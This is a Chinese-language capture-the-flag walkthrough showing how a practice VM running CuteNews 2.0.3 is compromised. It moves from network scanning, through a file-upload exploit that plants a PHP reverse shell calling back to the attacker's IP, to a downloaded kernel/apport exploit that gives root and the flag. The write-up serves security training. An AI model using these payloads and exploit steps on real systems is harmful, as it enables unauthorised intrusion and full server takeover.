信息收集
1、arp探测
来探测本地接口的存活主机
┌──(root㉿ru)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.11.81
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 fc:86:2a:4a:6f:ec Huawei Device Co., Ltd.
192.168.11.15 30:03:c8:49:52:4d CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.36 3c:55:76:dc:ab:f5 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.46 14:de:39:c3:4f:31 Huawei Device Co., Ltd.
192.168.11.22 e0:d0:45:5c:f5:53 Intel Corporate
192.168.11.33 f4:a4:75:fe:6b:2c Intel Corporate
192.168.11.68 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.11.86 00:0c:29:cc:9c:f1 VMware, Inc.
192.168.11.18 3c:e9:f7:c0:ef:c7 Intel Corporate
192.168.11.20 3c:21:9c:fd:7b:6d Intel Corporate
2、netdiscover
netdiscover -r 192.168.11.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
11 Captured ARP Req/Rep packets, from 9 hosts. Total size: 660
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.11.1 fc:86:2a:4a:6f:ec 3 180 Huawei Device Co., Ltd.
192.168.11.36 3c:55:76:dc:ab:f5 1 60 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.22 e0:d0:45:5c:f5:53 1 60 Intel Corporate
192.168.11.33 f4:a4:75:fe:6b:2c 1 60 Intel Corporate
192.168.11.20 3c:21:9c:fd:7b:6d 1 60 Intel Corporate
192.168.11.46 14:de:39:c3:4f:31 1 60 Huawei Device Co., Ltd.
192.168.11.86 00:0c:29:cc:9c:f1 1 60 VMware, Inc.
192.168.11.68 7c:b5:66:a5:f0:a5 1 60 Intel Corporate
192.168.11.69 e6:bf:32:e2:1b:48 1 60 Unknown vendor
3、nmap
主机存活探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sn 192.168.11.0/24 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:27 CST
Nmap scan report for 192.168.11.1
Host is up (0.0092s latency).
MAC Address: FC:86:2A:4A:6F:EC (Huawei Device)
Nmap scan report for 192.168.11.15
Host is up (0.13s latency).
MAC Address: 30:03:C8:49:52:4D (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.11.20
Host is up (0.12s latency).
MAC Address: 3C:21:9C:FD:7B:6D (Intel Corporate)
Nmap scan report for 192.168.11.22
Host is up (0.12s latency).
MAC Address: E0:D0:45:5C:F5:53 (Intel Corporate)
Nmap scan report for 192.168.11.33
Host is up (0.12s latency).
MAC Address: F4:A4:75:FE:6B:2C (Intel Corporate)
Nmap scan report for 192.168.11.36
Host is up (0.00016s latency).
MAC Address: 3C:55:76:DC:AB:F5 (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.11.46
Host is up (0.024s latency).
MAC Address: 14:DE:39:C3:4F:31 (Huawei Device)
Nmap scan report for 192.168.11.68
Host is up (0.11s latency).
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)
Nmap scan report for 192.168.11.69
Host is up (0.12s latency).
MAC Address: E6:BF:32:E2:1B:48 (Unknown)
Nmap scan report for 192.168.11.86
Host is up (0.00014s latency).
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap scan report for 192.168.11.81
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 0.77 seconds
端口探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.11.86 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:28 CST
Nmap scan report for 192.168.11.86
Host is up (0.0015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds
信息探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p80 192.168.11.86 --min-rate 10000 -oA xx
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:31 CST
Nmap scan report for 192.168.11.86
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
-sC : 以默认脚本进行扫描
-sV : 扫描各系统以及服务版本
-sT : 以tcp扫描进行探测
-O : 整体进行探测
-p : 指定端口
--min-rate 10000 : 以一万的速率进行扫描
udp探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.11.86 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:29 CST
Nmap scan report for 192.168.11.86
Host is up (0.00023s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
682/udp closed xfr
772/udp closed cycleserv2
9103/udp closed bacula-sd
20518/udp closed unknown
41774/udp closed unknown
49179/udp closed unknown
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
漏洞探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p80 192.168.11.86 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:34 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.11.86
Host is up (0.00065s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.11.86
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.11.86:80/
| Form id: login_form
| Form action: /index.php
|
| Path: http://192.168.11.86:80/?register
| Form id: regpassword
| Form action: /index.php?register
|
| Path: http://192.168.11.86:80/?register&lostpass
| Form id:
| Form action: /index.php
|
| Path: http://192.168.11.86:80/index.php
| Form id: login_form
| Form action: /index.php
|
| Path: http://192.168.11.86:80/index.php?register
| Form id: regpassword
|_ Form action: /index.php?register
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /rss.php: RSS or Atom feed
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 344.99 seconds
4、nikto
┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.11.86 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.11.86
+ Target Hostname: 192.168.11.86
+ Target Port: 80
+ Start Time: 2023-11-27 14:35:16 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: Cookie CUTENEWS_SESSION created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.6.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /docs/: Directory indexing found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8103 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-11-27 14:35:31 (GMT8) (15 seconds)
---------------------------------------------------------------------------
目录探测
1、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.11.86 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.11.86
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 301) [Size: 312] [--> http://192.168.11.86/docs/]
/uploads (Status: 301) [Size: 315] [--> http://192.168.11.86/uploads/]
/skins (Status: 301) [Size: 313] [--> http://192.168.11.86/skins/]
/core (Status: 301) [Size: 312] [--> http://192.168.11.86/core/]
/cdata (Status: 301) [Size: 313] [--> http://192.168.11.86/cdata/]
/server-status (Status: 403) [Size: 293]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================
2、dirb
└─# cat dirb.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: /root/lianxi/dirb.txt
START_TIME: Mon Nov 27 17:19:21 2023
URL_BASE: http://192.168.11.86/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.11.86/ ----
==> DIRECTORY: http://192.168.11.86/core/
==> DIRECTORY: http://192.168.11.86/docs/
+ http://192.168.11.86/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.11.86/index.php (CODE:200|SIZE:2487)
+ http://192.168.11.86/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.11.86/skins/
==> DIRECTORY: http://192.168.11.86/uploads/
---- Entering directory: http://192.168.11.86/core/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.11.86/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.11.86/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.11.86/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Nov 27 17:19:25 2023
DOWNLOADED: 4612 - FOUND: 3
3、dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.11.86 -e* -o /root/lianxi/dirsearch.txt
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490
Output File: /root/lianxi/dirsearch.txt
Error Log: /root/.dirsearch/logs/errors-23-11-27_17-19-56.log
Target: http://192.168.11.86/
[17:19:56] Starting:
[17:19:58] 403 - 285B - /.php3
[17:20:00] 200 - 3KB - /LICENSE.txt
[17:20:00] 200 - 2KB - /README.md
[17:20:12] 301 - 312B - /core -> http://192.168.11.86/core/
[17:20:13] 200 - 1KB - /docs/
[17:20:13] 301 - 312B - /docs -> http://192.168.11.86/docs/
[17:20:14] 200 - 12KB - /example.php
[17:20:14] 200 - 1KB - /favicon.ico
[17:20:17] 200 - 2KB - /index.php
[17:20:17] 200 - 2KB - /index.php/login/
[17:20:24] 200 - 28B - /print.php
[17:20:26] 200 - 105B - /rss.php
[17:20:26] 200 - 5KB - /search.php
[17:20:26] 403 - 293B - /server-status
[17:20:26] 403 - 294B - /server-status/
[17:20:28] 301 - 313B - /skins -> http://192.168.11.86/skins/
[17:20:31] 301 - 315B - /uploads -> http://192.168.11.86/uploads/
[17:20:31] 200 - 743B - /uploads/
Task Completed
4、feroxbuster
feroxbuster -u http://192.168.11.86 -x php -w 字典
whatweb
┌──(root㉿ru)-[~/lianxi]
└─# whatweb http://192.168.11.86/
http://192.168.11.86/ [200 OK]
Apache[2.4.7], Cookies[CUTENEWS_SESSION], Country[RESERVED][ZZ],
HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.11.86],
PHP[5.5.9-1ubuntu4.6], PasswordField[password], Script[text/javascript],
Title[Please Login / CuteNews], UncommonHeaders[accept-charset],
X-Frame-Options[sameorigin], X-Powered-By[PHP/5.5.9-1ubuntu4.6]
WEB
1、cms
![](https://i-blog.csdnimg.cn/blog_migrate/a1dcc9df4f7b911abcfe90032ed72a44.png)
显而易见,这是一套内容管理系统,既然给了cms的名称和版本。说明很可能存在漏洞。
2、searchsploit
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit CuteNews 2.0.3
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.0.3 - Arbitrary File Upload | php/webapps/37474.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
poc
┌──(root㉿ru)-[~/lianxi]
└─# cat 37474.txt
CuteNews 2.0.3 Remote File Upload Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm T0x!c member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz .....
==========================================================
# Exploit :
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
1 - Sign up for New User
2 - Log In
3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
4 - Select Upload Avatar Example: Evil.jpg
5 - use tamper data & Rename File Evil.jpg to Evil.php
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
根据poc我们大概知道,首先让我们先创建一个账号登录上去,然后利用文件上传漏洞,进行上传shell。然后开启监听,等待反弹shell即可。
反弹shell
1、payload
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.81/3636 0>&1'"); ?>
2、上传
![](https://i-blog.csdnimg.cn/blog_migrate/8db0bb76ba85c555a8cc77beb362eac7.png)
上传成功!
3、反弹shell
点击payload
┌──(root㉿ru)-[~/lianxi]
└─# nc -lvnp 3636
listening on [any] 3636 ...
connect to [192.168.11.81] from (UNKNOWN) [192.168.11.86] 36287
bash: cannot set terminal process group (1184): Inappropriate ioctl for device
bash: no job control in this shell
www-data@simple:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/var/www/html/uploads$ pwd
pwd
/var/www/html/uploads
www-data@simple:/var/www/html/uploads$
提权
内核提权
www-data@simple:/home/bull$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux
www-data@simple:/home/bull$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.2 LTS
Release: 14.04
Codename: trusty
www-data@simple:/home/bull$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@simple:/home/bull$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/at
/usr/bin/passwd
/bin/fusermount
/bin/su
/bin/ping6
/bin/ping
/bin/mount
/bin/umount
www-data@simple:/home/bull$
www-data@simple:/tmp$ wget http://192.168.11.86:8080/37088.c
wget http://192.168.11.86:8080/37088.c
--2023-11-27 03:12:14-- http://192.168.11.86:8080/37088.c
Connecting to 192.168.11.86:8080... failed: Connection refused.
www-data@simple:/tmp$ wget http://192.168.11.81:8080/37088.c
wget http://192.168.11.81:8080/37088.c
--2023-11-27 03:12:33-- http://192.168.11.81:8080/37088.c
Connecting to 192.168.11.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6027 (5.9K) [text/x-csrc]
Saving to: '37088.c'
0K ..... 100% 1.02G=0s
2023-11-27 03:12:33 (1.02 GB/s) - '37088.c' saved [6027/6027]
www-data@simple:/tmp$ ls -al
ls -al
total 16
drwxrwxrwt 2 root root 4096 Nov 27 03:12 .
drwxr-xr-x 21 root root 4096 Sep 9 2015 ..
-rw-r--r-- 1 www-data www-data 6027 Nov 27 2023 37088.c
www-data@simple:/tmp$ chmod +x 37088.c
chmod +x 37088.c
www-data@simple:/tmp$ gcc 37088.c -o 37088
gcc 37088.c -o 37088
www-data@simple:/tmp$ ls
ls
37088
37088.c
www-data@simple:/tmp$ ./37088
./37088
created /var/crash/_bin_sleep.33.crash
crasher: my pid is 1585
apport stopped, pid = 1586
getting pid 1585
current pid = 1584..2500..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..
** child: current pid = 1585
** child: executing /bin/su
su: must be run from a terminal
sleeping 2s..
checker: mode 4516
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..
checker: new mode 32768 .. done
checker: SIGCONT
checker: writing core
checker: done
success
stty: standard input: Inappropriate ioctl for device
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
get flag
# cd /root
# ls
flag.txt
# cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
#